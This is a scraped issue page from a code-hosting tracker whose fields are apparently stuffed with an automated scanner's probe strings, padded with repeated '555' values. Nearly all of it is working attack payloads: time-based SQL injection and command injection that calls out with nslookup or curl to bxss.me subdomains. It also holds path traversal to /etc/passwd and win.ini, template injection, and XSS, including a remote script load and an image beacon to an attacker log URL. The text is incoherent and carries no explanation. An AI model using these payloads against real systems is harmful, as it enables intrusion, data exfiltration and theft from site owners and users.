1 #190
Notifications
Total Time Spent: 117 hours 56 minutes
Due Date
RDFYjolf
117 hours 56 minutes
No due date set.
Dependencies
No dependencies set.
Reference: nicolecordeaux/6154606#190
Reference in New Issue
Block a user
No description provided.
Delete Branch "%!s()"
Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?
555
555
555
555
555
1LP6OKF3X2K0
555
555
555
555
'.gethostbyname(lc('hitcw'.'qaixzioq1f9e7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(75).chr(112).chr(77).'
".gethostbyname(lc("hitik"."izqvlmgq0c7d6.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(67).chr(102).chr(67)."
gethostbyname(lc('hitmr'.'qojwqkqm516bb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(89).chr(97).chr(67)
555
555
redirtest.acx
555
555
555
555
555
555
555
vNEXz6OS
555
555
ONTvONP4: nAHq1Qcg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
../../../../../../../../../../../../../../windows/win.ini
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
555
555
555
file:///etc/passwd
/etc/shells
555
${10000439+9999307}
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
../555
555
c:/windows/win.ini
555
555
bxss.me
555
Http://bxss.me/t/fit.txt
555
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
response.write(9648920*9090457)
555
555
'+response.write(9648920*9090457)+'
555
555
555
555
555
"+response.write(9648920*9090457)+"
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
'"
"+"A".concat(70-3).concat(22*4).concat(102).concat(78).concat(107).concat(68)+(require"socket"
Socket.gethostbyname("hitgi"+"cthsmvpv1b97b.bxss.me.")[3].to_s)+"
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(109).concat(80).concat(98).concat(87)+(require'socket'
Socket.gethostbyname('hitwb'+'wowscocrd8e89.bxss.me.')[3].to_s)+'
555
555
'A'.concat(70-3).concat(22*4).concat(114).concat(89).concat(110).concat(74)+(require'socket'
Socket.gethostbyname('hitrq'+'bjfbfwbrb2b69.bxss.me.')[3].to_s)
555
555
555
555
555
555&n955938=v942013
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo mvqulf$()\ nuxnkf\nz^xyu||a #' &echo mvqulf$()\ nuxnkf\nz^xyu||a #|" &echo mvqulf$()\ nuxnkf\nz^xyu||a #
555
)
index.php
&echo jzijvs$()\ jchzwk\nz^xyu||a #' &echo jzijvs$()\ jchzwk\nz^xyu||a #|" &echo jzijvs$()\ jchzwk\nz^xyu||a #
555
!(()&&!|||
555
index.php�
555&echo ljjkkq$()\ tqzwuf\nz^xyu||a #' &echo ljjkkq$()\ tqzwuf\nz^xyu||a #|" &echo ljjkkq$()\ tqzwuf\nz^xyu||a #
${@print(md5(31337))}
index.php/.
^(#
!@#)(()))******555
555
|echo mtitru$()\ djpdsi\nz^xyu||a #' |echo mtitru$()\ djpdsi\nz^xyu||a #|" |echo mtitru$()\ djpdsi\nz^xyu||a #
${@print(md5(31337))}\
555
'"()
555
555'&&sleep(27*1000)*sbaukp&&'
555|echo epaxng$()\ tgzlla\nz^xyu||a #' |echo epaxng$()\ tgzlla\nz^xyu||a #|" |echo epaxng$()\ tgzlla\nz^xyu||a #
'.print(md5(31337)).'
555
555
555
555"&&sleep(27*1000)*elqiwr&&"
555
expr 9000677401 - 989648
555
555
555
555
555'||sleep(27*1000)*bqifdi||'
(nslookup -q=cname hitmrwyfcywzo2a82e.bxss.me||curl hitmrwyfcywzo2a82e.bxss.me))
555
555
555"||sleep(27*1000)*ruxmpf||"
$(nslookup -q=cname hitvldopwkwvydbec7.bxss.me||curl hitvldopwkwvydbec7.bxss.me)
555
&nslookup -q=cname hitrccgquxxmke1586.bxss.me&'"
0&nslookup -q=cname hitrccgquxxmke1586.bxss.me&'555
555
555
555
&(nslookup -q=cname hitpbxzrbxllze14d1.bxss.me||curl hitpbxzrbxllze14d1.bxss.me)&'"
0&(nslookup -q=cname hitpbxzrbxllze14d1.bxss.me||curl hitpbxzrbxllze14d1.bxss.me)&'555
555
555
555
|(nslookup -q=cname hitfwikgtdbpu3493a.bxss.me||curl hitfwikgtdbpu3493a.bxss.me)
555
555
555
(nslookup -q=cname hitpjeikmevjk8d105.bxss.me||curl hitpjeikmevjk8d105.bxss.me)555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitolrcsddtun8a1f8.bxss.me||curl${IFS}hitolrcsddtun8a1f8.bxss.me)
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitzlxzztkykv51b01.bxss.me||curl${IFS}hitzlxzztkykv51b01.bxss.me)&'"
0&(nslookup${IFS}-q${IFS}cname${IFS}hitzlxzztkykv51b01.bxss.me||curl${IFS}hitzlxzztkykv51b01.bxss.me)&'555
555
-1 OR 5*5=25 --
555
-1 OR 5*5=25
555
-1' OR 5*5=25 --
555
-1" OR 5*5=25 --
555
555
-1' OR 5*5=25 or 'hrCpbsAB'='
-1" OR 5*5=25 or "Ukfn5495"="
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/
555
555
555
555-1 waitfor delay '0:0:15' --
555-1 OR 350=(SELECT 350 FROM PG_SLEEP(15))--
555-1) OR 302=(SELECT 302 FROM PG_SLEEP(15))--
555-1)) OR 36=(SELECT 36 FROM PG_SLEEP(15))--
555
5558yX67olC' OR 302=(SELECT 302 FROM PG_SLEEP(15))--
555FYnMUuPG') OR 589=(SELECT 589 FROM PG_SLEEP(15))--
555u9AdAU0r')) OR 614=(SELECT 614 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
@@Lg1tN
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<ScRiPt >3iwV(9540)</ScRiPt>
555
'"()&%<ScRiPt >3iwV(9641)</ScRiPt>
5559263166
bfg9368<s1﹥s2ʺs3ʹhjl9368
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
555
555
dfb{{98991*97996}}xca
555
redirtest.acx
555
555
'.gethostbyname(lc('hitgx'.'bbhtkltn75871.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(84).chr(98).chr(88).'
".gethostbyname(lc("hithd"."vgqkwmffb9d0b.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(86).chr(107).chr(82)."
dfb${98991*97996}xca
gethostbyname(lc('hitcw'.'fpuooscw367c9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(78).chr(110).chr(68)
555
555
dfb__${98991*97996}__::.x
555
555
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
555
555
555
ksma17Ov
555
bfg7816<s1﹥s2ʺs3ʹhjl7816
cUWY7qQe: 73pKYo8G
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
/etc/shells
555
555
<%={{={@{#{${dfb}}%>
555
../../../../../../../../../../../../../../etc/shells
555
${10000150+9999772}
c:/windows/win.ini
555
../../../../../../../../../../../../../../etc/passwd
555
bxss.me
555
../../../../../../../../../../../../../../windows/win.ini
555
555
file:///etc/passwd
Http://bxss.me/t/fit.txt
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
../555
555
555
xfs.bxss.me
<th:t="${dfb}#foreach
555
555
555
555
555
555
555
response.write(9668283*9937529)
555
555
555
'+response.write(9668283*9937529)+'
555
555
555
555
555
555
"+response.write(9668283*9937529)+"
555
555
555
555
555
555
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
"+"A".concat(70-3).concat(22*4).concat(99).concat(81).concat(97).concat(81)+(require"socket"
Socket.gethostbyname("hitmm"+"qdequnczf0bbb.bxss.me.")[3].to_s)+"
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(98).concat(65).concat(101).concat(69)+(require'socket'
Socket.gethostbyname('hitae'+'ofcejjgi0349d.bxss.me.')[3].to_s)+'
555
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(103).concat(78).concat(121).concat(78)+(require'socket'
Socket.gethostbyname('hitqv'+'aaxswwjydbcac.bxss.me.')[3].to_s)
'"
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
555
555
dfb{{98991*97996}}xca
555
555
555
555&n900928=v971218
555
555
555
555
555
555
555
echo beparn$()\ aovwpl\nz^xyu||a #' &echo beparn$()\ aovwpl\nz^xyu||a #|" &echo beparn$()\ aovwpl\nz^xyu||a #
555
dfb${98991*97996}xca
555
555
&echo pnpjmd$()\ zapuki\nz^xyu||a #' &echo pnpjmd$()\ zapuki\nz^xyu||a #|" &echo pnpjmd$()\ zapuki\nz^xyu||a #
555
555
555
555
555&echo riwwjc$()\ vkzyft\nz^xyu||a #' &echo riwwjc$()\ vkzyft\nz^xyu||a #|" &echo riwwjc$()\ vkzyft\nz^xyu||a #
)
555
555
dfb__${98991*97996}__::.x
|echo ywyycu$()\ nuwxdr\nz^xyu||a #' |echo ywyycu$()\ nuwxdr\nz^xyu||a #|" |echo ywyycu$()\ nuwxdr\nz^xyu||a #
555
!(()&&!|||
555
555
${@print(md5(31337))}
555|echo gsifwa$()\ fnhsbb\nz^xyu||a #' |echo gsifwa$()\ fnhsbb\nz^xyu||a #|" |echo gsifwa$()\ fnhsbb\nz^xyu||a #
555
^(#
!@#)(()))******555
index.php
${@print(md5(31337))}\
expr 9000896456 - 946936
'"()
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
index.php�
555
'.print(md5(31337)).'
(nslookup -q=cname hittwfaqchboe0a760.bxss.me||curl hittwfaqchboe0a760.bxss.me))
555'&&sleep(27*1000)*hzmohu&&'
555
index.php/.
555
555
$(nslookup -q=cname hiteykbygmfyv96864.bxss.me||curl hiteykbygmfyv96864.bxss.me)
555"&&sleep(27*1000)*okkxzb&&"
555
555
555
555
&nslookup -q=cname hitbcdxcjimsscd231.bxss.me&'"
0&nslookup -q=cname hitbcdxcjimsscd231.bxss.me&'555'||sleep(27*1000)*pfxkoe||'
555<ScRiPt >3iwV(9901)</ScRiPt>
555
555
555
&(nslookup -q=cname hitwtrayfdksf25556.bxss.me||curl hitwtrayfdksf25556.bxss.me)&'"
0&(nslookup -q=cname hitwtrayfdksf25556.bxss.me||curl hitwtrayfdksf25556.bxss.me)&'555"||sleep(27*1000)*wmjtoy||"
555
555
|(nslookup -q=cname hitbwbqucmhbkb33ec.bxss.me||curl hitbwbqucmhbkb33ec.bxss.me)
555
555
555
(nslookup -q=cname hitpzyyohfmhtf9130.bxss.me||curl hitpzyyohfmhtf9130.bxss.me)555
555AU3J1[!+!]
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitdznvpqmddrfd693.bxss.me||curl${IFS}hitdznvpqmddrfd693.bxss.me)
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitjrvptqvjwp319df.bxss.me||curl${IFS}hitjrvptqvjwp319df.bxss.me)&'"
0&(nslookup${IFS}-q${IFS}cname${IFS}hitjrvptqvjwp319df.bxss.me||curl${IFS}hitjrvptqvjwp319df.bxss.me)&'555
555
555<script>3iwV(9792)</script>
555
555
555
555
555
555
555<script>3iwV(9183)</script>9183
555
555
555
555<ScR<ScRiPt>IpT>3iwV(9647)</sCr<ScRiPt>IpT>
555
555
555
555
555
555<ScRiPt
555
555
555
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9114></ScRiPt>
555
555
555
555
555
555<�ScRiPt
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
555
-1 OR 5*5=25
-1' OR 5*5=25 --
555
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'dDwXJz8c'='
-1" OR 5*5=25 or "TLtDRqU7"="
555<img/src=">" onerror=alert(9000)>
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
%35%35%35%3C%53%63%52%69%50%74%20%3E%33%69%77%56%289269%29%3C%2F%73%43%72%69%70%54%3E
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/
555\u003CScRiPt\3iwV(9722)\u003C/sCripT\u003E
555-1 waitfor delay '0:0:15' --
555-1 OR 612=(SELECT 612 FROM PG_SLEEP(15))--
555-1) OR 80=(SELECT 80 FROM PG_SLEEP(15))--
555
555-1)) OR 436=(SELECT 436 FROM PG_SLEEP(15))--
555ZBSyZ7wh' OR 440=(SELECT 440 FROM PG_SLEEP(15))--
5559u0E98wL') OR 173=(SELECT 173 FROM PG_SLEEP(15))--
555sayZYd3i')) OR 649=(SELECT 649 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
@@yChnI
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555}body{zzz:Expre/**/SSion(3iwV(9124))}
555
555
555x7E7H
<ScRiPt >3iwV(9596)</ScRiPt>555
555CQ7OO[!+!]
555
555
555
555
555
555
555
555<img sRc='http://attacker-9882/log.php?
555
555
555<aIpx0cV<
555
555
555
555
555
555
555
555
555
555
555